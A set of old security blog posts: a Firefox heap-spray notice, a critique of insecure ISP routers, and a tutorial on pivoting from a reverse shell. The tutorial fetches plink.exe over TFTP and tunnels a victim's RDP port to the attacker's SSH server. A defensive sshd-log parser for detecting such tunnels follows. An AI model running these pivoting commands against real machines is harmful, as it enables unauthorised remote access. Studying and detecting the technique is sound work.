Not long ago, Firefox released version 3.5… Happy news! Unfortunately, a heap spray vulnerability was found not long after… not good. Here’s a small article on the subject -here-
Here’s a proof of concept exploit to see the vulnerability in action:
Fortunately for us, Firefox has issued an update. So don’t forget to update your newly upgraded Firefox.
Nothing really technical today, just an opinion on a popular ISP in my area.
When you subscribe, you are offered the choice to receive a wireless router, as an added bonus for people who may not be able to configure the device themselves. It either comes pre-configured, or a technician can swing by and set it up for you.
That’s about the only good thing about the service. Bob mentioned to me not long ago that he had found a few security issues, and they alarmed me.
For starters, the router is configured by default with WEP, which can be easily cracked using aircrack. The default WEP key is actually the router’s serial number. Lastly, and this is what made me jump, there is no username & password on the router… by default! As Bob was telling me, he managed to crack a few WEP keys and enter these “secure” routers provided by one of the biggest ISPs in Canada. The router has many options, such as opening and closing ports and redirecting traffic, just to name a few. The worst part: it never asks for a password when saving these new settings.
Another thing that surprised me is that this router also acts as the client’s modem. So along with all the local network’s information found on the device, you can also retrieve the username and password for the customer’s internet connection.
I know for a fact that clients with no wireless devices often receive these routers so they can set up a local network easily. What does this mean? A vulnerable network, and who knows what it may contain and who may attack it. Knowing all of this, what would stop someone from coding a virus/worm/trojan to take advantage of it? I don’t know, I suppose it’s possible; I mean, look at Conficker and all it did (and is still doing). In my opinion, ISPs giving away these insecure devices and not taking the time to configure them with a minimum of protection aren’t helping.
Probably, involuntarily of course, they are even helping the spread of malware on the net.
An SSH tunnel encrypts traffic and lets you reach non-routable machines in a secure way.
Here’s a nice wiki explaining the subject in more depth -here-
So let’s imagine you’ve managed to receive a reverse shell from your target Windows machine. Once at the command prompt, you notice other local ports open that were not available to you during your initial attack (how you got your reverse shell is not important).
Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting, but that would be better explained with Metasploit). The exercise here is how to reach this non-routed port from your machine, which sits outside the network. The answer is a tunnel, and in our case an SSH tunnel.
First you’ll need an SSH server on your system (the attacker) and an SSH client on your target. This example assumes that outgoing traffic isn’t limited or monitored. Remember, this is just a simple exercise that can easily be done at home on your local network.
Let’s start by getting a simple SSH client onto our Windows machine. There are many ways one can do this; I prefer using TFTP for two reasons: Windows usually comes with a TFTP client, and BackTrack has a nifty TFTP server readily available. (Note: always verify the server’s upload/download options first.)
So let’s start by uploading our SSH client, “plink.exe”:
C:\>TFTP -i -your IP here- GET plink.exe
There’s no progress bar, so you’ll just have to wait for your prompt to come back once the transfer is finished.
Now that you have your client, let’s start our SSH connection. Make sure you have your listener set up.
C:\>plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-
Real quick: the -C enables compression on the connection, and the -R remotely forwards the port. In this case it makes your SSH server listen on its own port 3389 and relay every connection to that port back through the tunnel to 127.0.0.1:3389 on the Windows machine. The user and password should be set to your own on the SSH server.
If all went well you’ll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now.
Start up rdesktop and point it to 127.0.0.1 on port 3389 and you’ll be rewarded with a nice remote desktop. One could use this method on other ports for other means.
As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine.
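The flip side of this technique is that the SSH server on the receiving end sees every -R request. As an added example (not part of the original post), here is a small Python parser that reads sshd logs and reports which authenticated session asked the server to open a listening port; the sample lines are constructed in the shape of OpenSSH output at LogLevel DEBUG1 (an assumed format, so check the wording against your own sshd version).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample lines (assumed OpenSSH DEBUG1 wording; not real server output).
# Session 4012 is the plink -R 3389 / -R 139 scenario from the post; 4100 is a normal login.
SAMPLE_LOG = """\
Jul  1 21:03:11 bt sshd[4012]: Accepted password for root from 192.168.1.20 port 49211 ssh2
Jul  1 21:03:11 bt sshd[4012]: debug1: server_input_global_request: rtype tcpip-forward want_reply 1
Jul  1 21:03:11 bt sshd[4012]: debug1: server_input_global_request: tcpip-forward listen 127.0.0.1 port 3389
Jul  1 21:05:42 bt sshd[4100]: Accepted publickey for alice from 192.168.1.7 port 50002 ssh2
Jul  1 21:05:43 bt sshd[4100]: debug1: server_input_global_request: rtype no-more-sessions@openssh.com want_reply 0
Jul  1 21:06:02 bt sshd[4012]: debug1: server_input_global_request: tcpip-forward listen 127.0.0.1 port 139
"""

# Successful authentication: ties the sshd pid to a user and source address.
ACCEPT_RE = re.compile(r"sshd\[(?P<pid>\d+)\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port \d+")
# Remote ("-R") forward request: the server is asked to listen on host:port.
FWD_RE = re.compile(r"sshd\[(?P<pid>\d+)\]: .*tcpip-forward listen (?P<host>\S+) port (?P<port>\d+)")

@dataclass
class Session:
    user: str
    src: str
    forwards: List[Tuple[str, int]] = field(default_factory=list)

def find_remote_forwards(log_text: str) -> Dict[str, Session]:
    """Return only the sessions (keyed by sshd pid) that requested remote forwards."""
    sessions: Dict[str, Session] = {}
    for line in log_text.splitlines():
        m = ACCEPT_RE.search(line)
        if m:
            sessions[m["pid"]] = Session(m["user"], m["src"])
            continue
        m = FWD_RE.search(line)
        if m:
            # Forward seen before the Accepted line (log rotation etc.): keep it, user unknown.
            sess = sessions.setdefault(m["pid"], Session("?", "?"))
            sess.forwards.append((m["host"], int(m["port"])))
    return {pid: s for pid, s in sessions.items() if s.forwards}

def alerts(log_text: str, watch_ports=(139, 445, 3389)) -> List[str]:
    """One human-readable line per forward; SMB/RDP ports get flagged."""
    out = []
    for pid, s in find_remote_forwards(log_text).items():
        for host, port in s.forwards:
            tag = " (sensitive service)" if port in watch_ports else ""
            out.append(f"pid {pid}: {s.user}@{s.src} asked sshd to listen on {host}:{port}{tag}")
    return out

if __name__ == "__main__":
    for a in alerts(SAMPLE_LOG):
        print(a)
```

On a server that should never relay traffic, sshd_config's AllowTcpForwarding no refuses these requests outright; the parser is for the case where forwarding is allowed but you want to know who uses it.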
Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world.